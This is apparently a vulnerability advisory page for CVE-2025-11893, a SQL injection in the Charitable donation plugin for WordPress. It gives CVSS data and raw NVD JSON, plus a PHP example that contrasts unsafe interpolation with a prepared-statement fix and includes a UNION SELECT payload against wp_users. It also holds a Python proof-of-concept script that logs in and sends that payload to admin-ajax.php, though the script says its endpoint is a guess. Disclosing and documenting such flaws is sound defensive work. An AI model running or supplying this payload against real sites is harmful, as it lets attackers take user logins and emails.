Security Vulnerability Report
CVE-2025-11893 CVSS 6.5 MEDIUM

CVE-2025-11893

Published: 2025-10-25 07:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to SQL Injection via the donation_ids parameter in all versions up to, and including, 1.8.8.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation of the vulnerability requires a paid donation.
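As an added illustration, not the plugin's own code and not taken from the referenced changeset, the PHP below contrasts the defect the description names (a user-supplied `donation_ids` string interpolated straight into the SQL) with the hardened form, which normalises the input to positive integers and binds each one through `$wpdb->prepare()`. The function names, the `WHERE p.ID IN ( ... )` clause shape and the comma-separated input format are assumptions made for the example.

```php
<?php
// Example code (constructed for this report, not the Charitable plugin's source).
// Assumes the WordPress global $wpdb and a request parameter that arrives either
// as an array or as a comma-separated string such as "12,15,16".

/**
 * Unsafe pattern (illustrative): the raw request value becomes part of the
 * statement, so any SQL appended after a valid ID is executed as SQL.
 */
function charitable_example_unsafe_where( $donation_ids ) {
    return "WHERE p.ID IN ( {$donation_ids} )";
}

/**
 * Hardened pattern: reduce the input to a list of positive integers and let
 * $wpdb->prepare() bind one %d placeholder per value. Non-numeric or zero
 * entries are dropped; an empty list yields a clause that matches nothing
 * rather than falling back to an unfiltered query.
 */
function charitable_example_safe_where( $donation_ids ) {
    global $wpdb;

    $ids = is_array( $donation_ids )
        ? $donation_ids
        : explode( ',', (string) $donation_ids );

    // absint() casts to a non-negative integer; array_filter() removes the zeros.
    $ids = array_values( array_filter( array_map( 'absint', $ids ) ) );

    if ( empty( $ids ) ) {
        return 'WHERE 1=0';
    }

    $placeholders = implode( ', ', array_fill( 0, count( $ids ), '%d' ) );

    return $wpdb->prepare( "WHERE p.ID IN ( {$placeholders} )", $ids );
}

// Constructed input of the kind the description warns about: a valid ID
// followed by an appended statement. The unsafe helper passes it through
// untouched; the safe helper keeps only the leading integer.
$tainted = '12 UNION SELECT user_login, user_email FROM wp_users--';
echo charitable_example_unsafe_where( $tainted ), PHP_EOL; // attacker text survives
echo charitable_example_safe_where( $tainted ), PHP_EOL;   // WHERE p.ID IN ( 12 )
```

In a code review, the signal to look for is any query builder that accepts `donation_ids` (or any ID list) and concatenates it into the statement; the fix is the same in every case: integer-cast the values and bind them through `prepare()`.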

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Charitable Plugin < 1.8.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
from urllib.parse import urlencode

# CVE-2025-11893 SQL Injection PoC
# Target: WordPress Charitable Plugin < 1.8.8.5
# Author: Security Researcher
# Note: This PoC is for educational and authorized testing purposes only


def exploit_sql_injection(target_url, wp_username, wp_password, donation_id):
    """
    Exploit SQL injection in Charitable plugin via donation_ids parameter
    """
    # Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()
    login_data = {
        'log': wp_username,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    print(f"[*] Authenticating as {wp_username}...")
    resp = session.post(login_url, data=login_data, allow_redirects=False)
    if resp.status_code != 302:
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # SQL Injection payload - extract user login and email
    # Using UNION-based injection technique
    sql_payload = f"{donation_id} UNION SELECT 1,2,3,4,5,6,7,8,9,10,user_login,user_email,14,15,16,17,18,19,20 FROM wp_users--"

    # Target endpoint (example - actual endpoint may vary)
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'charitable_get_donations',
        'donation_ids': sql_payload
    }
    print("[*] Sending SQL injection payload...")
    print(f"[Payload] {sql_payload}")
    try:
        resp = session.post(exploit_url, data=exploit_data, timeout=30)
        if resp.status_code == 200:
            print("[+] Request sent, check response for extracted data")
            print(f"[Response] {resp.text[:500]}")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <wp_user> <wp_pass> <donation_id>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    donation_id = sys.argv[4]
    exploit_sql_injection(target, user, password, donation_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11893", "sourceIdentifier": "[email protected]", "published": "2025-10-25T07:15:40.540", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to SQL Injection via the donation_ids parameter in all versions up to, and including, 1.8.8.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation of the vulnerability requires a paid donation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/charitable/trunk/includes/abstracts/abstract-class-charitable-query.php#L194", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3382719/charitable/trunk/includes/abstracts/abstract-class-charitable-query.php?contextall=1", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/46b7820c-f36d-4c7d-b326-07259786fc6a?source=cve", "source": "[email protected]"}]}}